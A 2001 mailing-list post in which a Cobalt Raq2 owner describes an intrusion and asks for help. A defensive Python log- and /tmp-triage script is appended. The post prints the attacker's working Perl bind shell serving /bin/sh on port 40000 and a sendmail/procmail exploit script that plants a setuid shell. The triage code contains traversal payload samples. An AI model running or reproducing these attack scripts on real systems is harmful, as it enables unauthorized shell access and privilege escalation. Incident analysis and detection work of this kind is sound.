[cobalt-users] Raq2 Hack
- Subject: [cobalt-users] Raq2 Hack
- From: Hacked Raq2 <jay-mon@xxxxxxxxxx>
- Date: Sun Aug 19 02:11:16 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hello all,
Well, it seems that I've had an intruder on my Raq2. What I'm trying to
figure out is how he got in. I have all the important patches applied and
I've shut down telnet in favor of running OpenSSH 2.9. I also run logcheck
and portsentry and usually keep a close eye on things.
What I'd like to do is just post some of the stuff I've found and see if
any of the security gurus might have an idea of what happened so I can
close things up. I realize that an OS restore might be the only option, but I
would like to explore the depth of this h4x0r's intrusion.
Here are the processes that were running. It appears he only had the
privileges of HTTPD:
httpd 19108 0.0 0.6 3012 864 ? S N Aug 17 0:00 sh -c /home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../../../../../../../../
httpd 19112 0.0 1.3 4748 1740 ? S N Aug 17 0:00 perl /tmp/shell.pl
httpd 19130 0.0 0.0 0 0 ? Z N Aug 17 0:00 (sh <zombie>)
httpd 19425 0.0 1.0 3720 1280 ? S N Aug 17 0:29 ./psybnc
httpd 20481 0.0 0.0 0 0 ? Z N Aug 17 0:00 (sh <zombie>)
httpd 20562 0.0 0.0 0 0 ? Z N Aug 17 0:00 (sh <zombie>)
httpd 22086 0.0 0.0 0 0 ? Z N Aug 17 0:00 (sh <zombie>)
httpd 22228 0.0 0.0 0 0 ? Z N Aug 17 0:00 (sh <zombie>)
I also see that he had some kind of IRC program running.
Here are the contents of the shell.pl that he had in /tmp:
#!/usr/bin/perl
require 5.002;
use Socket;
$protocol = getprotobyname('tcp');
socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socket\n";
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bind\n";
listen(S, 3) || die "can't listen\n";
while (1) { YOP: accept (THC, S) || goto YOP;
if (! ($pid=fork))
{ goto BYE if (! defined $pid);
open STDIN, "<&THC"; open STDOUT, ">&THC";
open STDERR, ">&THC";
exec "/bin/sh -i" || print THC "couldn't spawn shell\n";
close THC; exit 0;}
else {BYE: close THC;}}
Here is a list of the files he put into /tmp:
1 httpd httpd 983040 May 22 10:07 psyBNC.tar
1 httpd httpd 639341 Aug 19 01:13 psybnc
1 httpd httpd 10240 Nov 7 1999 sendmail-8.9.3.tar
2 httpd httpd 1024 Aug 19 01:48 sendmail89x
1 httpd httpd 559 Aug 17 19:30 shell.pl
1 httpd httpd 1 Aug 17 21:25 suid.sh
The directory sendmail89x has the following files in it:
529 Jul 2 1999 exploit.sh
1287 Jul 1 1999 sendmail.c
Here are the contents of exploit.sh:
#!/bin/sh
# rpmmail (sendmail 8.9.3/8.9.1 procmail 3.10.x)
# by icesk, greetz to that triq ass bitch from ATR, obsolete, and #b4b0
echo "[icesk] createing suid shellscript"
echo <<EOF > /tmp/suid.sh
#!/bin/sh
cp /bin/sh /tmp/sh;chmod +s /tmp/sh
EOF
chmod +x /tmp/suid.sh
echo "[icesk] `ls -l /tmp/suid.sh`"
echo "[icesk] compileing exploit"
gcc -o sendmail sendmail.c
echo "[icesk] expl01t1ng m41l f34r!@$"
./sendmail 127.0.0.1 /tmp/suid.sh
echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"
echo "[icesk] done."
If anyone could help me understand this exploit a little more and maybe give
me some ideas on where to look for his entry point, I would really
appreciate it.
TIA,
h4ck3d
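The two artefacts in the post that point at the entry point are the `sh -c .../cgi-bin/Mall/../../..` command in the process list (a directory traversal exercised through a CGI script, running as httpd) and the attacker-owned files left in /tmp. As an added example that is not part of the original post, the following script shows how a defender would triage both: it scans Apache common-log-format lines for URL-encoded or double-encoded `..` segments aimed at cgi-bin, and walks a scratch directory for files that are setuid/setgid or owned by the web-server account. The log lines, the directory and the file it creates are constructed for the demonstration; the real access log on a Raq2 and the uid of `httpd` are assumptions you would substitute.

```python
#!/usr/bin/env python3
"""Triage helper (added example, not from the post) for a web-server-account
intrusion: find traversal requests in the access log and attacker files in /tmp."""
import os
import re
import stat
import tempfile
from urllib.parse import unquote

# Apache common log format: host ident user [time] "METHOD path PROTO" status bytes
_CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample lines; the traversal ones mimic the cgi-bin/Mall/../.. path
# from the ps listing, in single- and double-URL-encoded form.
SAMPLE_LOG = [
    '203.0.113.9 - - [17/Aug/2001:19:28:41 -0700] "GET /cgi-bin/Mall/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.0" 200 512',
    '203.0.113.9 - - [17/Aug/2001:19:29:02 -0700] "GET /cgi-bin/Mall/%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.0" 200 512',
    '198.51.100.4 - - [17/Aug/2001:19:30:10 -0700] "GET /cgi-bin/Mall/index.cgi?item=../42 HTTP/1.0" 200 2048',
    '198.51.100.4 - - [17/Aug/2001:19:30:11 -0700] "GET /images/logo.gif HTTP/1.0" 200 1203',
]


def decode_path(raw):
    """URL-decode up to three times so double-encoded '..' (%252e%252e) is exposed."""
    cur = raw
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def traversal_depth(path):
    """Count '..' path segments; the query string is ignored (not a filesystem path)."""
    path = path.split('?', 1)[0].replace('\\', '/')
    return sum(1 for seg in path.split('/') if seg == '..')


def find_traversal(log_lines, min_depth=1):
    """One record per CLF line whose decoded request path climbs with '..'.
    'cgi' marks requests under /cgi-bin/, where the traversal in the post was run."""
    hits = []
    for line in log_lines:
        m = _CLF.match(line)
        if not m:
            continue
        host, ts, method, path, status = m.groups()
        decoded = decode_path(path)
        depth = traversal_depth(decoded)
        if depth >= min_depth:
            hits.append({'host': host, 'time': ts, 'method': method,
                         'status': int(status), 'path': decoded,
                         'depth': depth, 'cgi': '/cgi-bin/' in decoded})
    return hits


def scan_scratch_dir(dirpath, suspect_uid):
    """Walk a world-writable directory; report setuid/setgid files and files
    owned by the web-server uid (the footprint in the post: psybnc, shell.pl,
    suid.sh all owned by httpd)."""
    findings = []
    for root, _dirs, files in os.walk(dirpath):
        for name in files:
            full = os.path.join(root, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            reasons = []
            if st.st_mode & stat.S_ISUID:
                reasons.append('setuid')
            if st.st_mode & stat.S_ISGID:
                reasons.append('setgid')
            if st.st_uid == suspect_uid:
                reasons.append('owned-by-web-account')
            if reasons:
                findings.append({'path': full, 'size': st.st_size, 'reasons': reasons})
    return findings


def demo_scan():
    """Constructed scratch dir with one setuid file owned by the current user,
    who stands in for the httpd account; returns what scan_scratch_dir flags."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, 'sh')
        with open(p, 'wb') as f:
            f.write(b'#!/bin/sh\n')
        os.chmod(p, 0o4755)            # setuid bit, as the post's suid.sh intends
        return scan_scratch_dir(d, os.getuid())


if __name__ == '__main__':
    for h in find_traversal(SAMPLE_LOG):
        print('traversal depth %d from %s at %s: %s' % (h['depth'], h['host'], h['time'], h['path']))
    for f in demo_scan():
        print('suspicious file %s (%d bytes): %s' % (f['path'], f['size'], ', '.join(f['reasons'])))
```

Run it against the real log with `find_traversal(open('/var/log/httpd/access_log'))` and against the scratch directory with `scan_scratch_dir('/tmp', pwd.getpwnam('httpd').pw_uid)`; the query-string exclusion is deliberate, since `?item=../42` never touches the filesystem path that the CGI wrapper resolves, while the double-decode loop is what catches the `%252e` variant that a single `unquote` would miss.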